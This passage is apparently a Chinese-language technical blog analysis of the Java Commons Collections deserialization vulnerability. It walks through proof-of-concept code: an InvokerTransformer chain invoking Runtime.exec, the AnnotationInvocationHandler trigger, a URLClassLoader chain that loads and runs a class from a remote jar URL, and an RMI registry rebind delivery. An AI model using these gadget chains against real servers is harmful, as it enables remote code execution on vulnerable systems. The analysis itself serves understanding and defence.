Map数据结构,转换后的Map
  整个poc的逻辑可以这么理解,构建了BeforeTransformerMap的键值对,为其赋值,利用TransformedMap的decorate方法,可以对Map数据结构的key,value进行transforme。
  TransformedMap.decorate方法,预期是对Map类的数据结构进行转化,该方法有三个参数。第一个参数为待转化的Map对象,第二个参数为Map对象内的key要经过的转化方法(可为单个方法,也可为链,也可为空),第三个参数为Map对象内的value要经过的转化方法。
  TransformedMap.decorate(目标Map, key的转化对象(单个或者链或者null), value的转化对象(单个或者链或者null));

  上图是调试时的转换变量内容,可以很清楚地看到执行完poc后,已经对Map的value进行了转换(过了一遍transformer链)。
  poc中对BeforeTransformerMap的value进行转换,当BeforeTransformerMap的value执行完一个完整转换链,完成了命令执行。
  在进行反序列化时,我们会调用ObjectInputStream类的readObject()方法。如果被反序列化的类重写了readObject(),那么该类在进行反序列化时,Java会优先调用重写的readObject()方法。
  结合前述Commons Collections的特性,如果某个可序列化的类重写了readObject()方法,并且在readObject()中对Map类型的变量进行了键值修改操作,并且这个Map变量是可控的,可以实现我们的攻击目标了。
  因此我们在poc中看见了下行的代码。
  Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
  这个类完全符合我们的要求,具体解释可以查看TSRC的文章。
  如果要实现一个可控的poc,需要对transformer链的构造进行理解。首先来看InvokerTransformer。
  InvokerTransformer(String methodName, Class[] paramTypes, Object[] args)
  参数依次为:方法名称,参数类型,参数对象 我们找其中一个来看下。
new InvokerTransformer(
"getMethod",
new Class[]  {String.class, Class[].class },
new Object[] {"getRuntime", new Class[0] }
),
new InvokerTransformer(
"invoke",
new Class[] {Object.class, Object[].class },
new Object[] {null, null }
),
new InvokerTransformer(
"exec",
new Class[] {String.class },
new Object[] {"gedit"}
)
  参数类型里面的内容完全对应于参数对象里的内容。
  PS:由于Method类的invoke(Object obj,Object args[])方法的定义,所以在反射内写new Class[] {Object.class, Object[].class }。
  所以正常流程如下所示:
  ((Runtime)Runtime.class.getMethod("getRuntime",null).invoke(null,null)).exec("gedit");
  基于报错的反序列化transformer链
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Java.net.URLClassLoader.class),
new InvokerTransformer(
"getConstructor",
new Class[] {Class[].class},
new Object[] {new Class[]{Java.net.URL[].class}}
),
new InvokerTransformer(
"newInstance",
new Class[] {Object[].class},
new Object[] { new Object[] { new Java.net.URL[] { new Java.net.URL(url) }}}
),
new InvokerTransformer(
"loadClass",
new Class[] { String.class },
new Object[] { "ErrorBaseExec" }
),
new InvokerTransformer(
"getMethod",
new Class[]{String.class, Class[].class},
new Object[]{"do_exec", new Class[]{String.class}}
),
new InvokerTransformer(
"invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new String[]{cmd}}
)
};
  有了先前的理解, 很明了了。先建立一个读取远程jar文件的类 URLClassLoader,实例化这个类,传入要访问的url,再读取远程加载类,接着获取类方法,然后反射这个方法。
  关于RMI利用的相关内容
  tang3已经在RMI利用文章讲过怎么利用了,这段内容,我只是详解下给出的poc的原理。
  poc部分内容
Transformer transformedChain = new ChainedTransformer(transformers);
Map BeforeTransformerMap = new HashMap();
innerMap.put("value", "value");
Map AfterTransformerMap = TransformedMap.decorate(BeforeTransformerMap, null, transformedChain);
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Target.class, AfterTransformerMap);
InvocationHandler h = (InvocationHandler) instance;
Remote r = Remote.class.cast(Proxy.newProxyInstance(
Remote.class.getClassLoader(),
new Class[]{Remote.class},
h));
try{
Registry registry = LocateRegistry.getRegistry(ip, port);
registry.rebind("", r); // r is remote obj
}
catch (Throwable e) {
e.printStackTrace();
}
  RMI利用的poc看上去还是很熟悉的,因为到建立instance时,还和之前的内容一致。之后便到了RMI内容独有的细节,从代码角度可以看出利用逻辑为:
  建立实例对象instance
  实例对象instance 转化为 InvocationHandler类型的句柄h(因为instance是序列化后的内容,所以instance是一串数据)
  把句柄h附载到Remote类实例 r上
  向远程服务器注册,得到远程注册对象 registry
  向远程注册对象registry注册 实例r
  在Java的RMI中,我们允许向远程已运行的jvm虚拟环境中绑定(rebind函数,也可以理解为添加)一些实例对象,通过RMI协议传输一些序列化好的内容,这样服务端解析(也是反序列化)传过来的数据后,便可把解析后的内容添加到运行环境中。构造remote类型实例r 方法很多,poc中利用动态代理创建remote实例r是方法之一。
  因此涉及RMI的代码也会存在Java反序列化漏洞。
  漏洞影响分析
  Java反序列化漏洞从爆出到现在快2个月了。开始的只能命令执行和反弹shell,到后来的有回显的命令执行,到终的代码执行,利用上来是越来越方便(有回显的命令执行和代码执行均为利用远程jar文件的利用形式)。从微博来看,已有白帽子实现了jenkins,weblogic,jboss等的代码执行利用工具。待终利用工具公布,此漏洞还会有一个上升趋势的影响。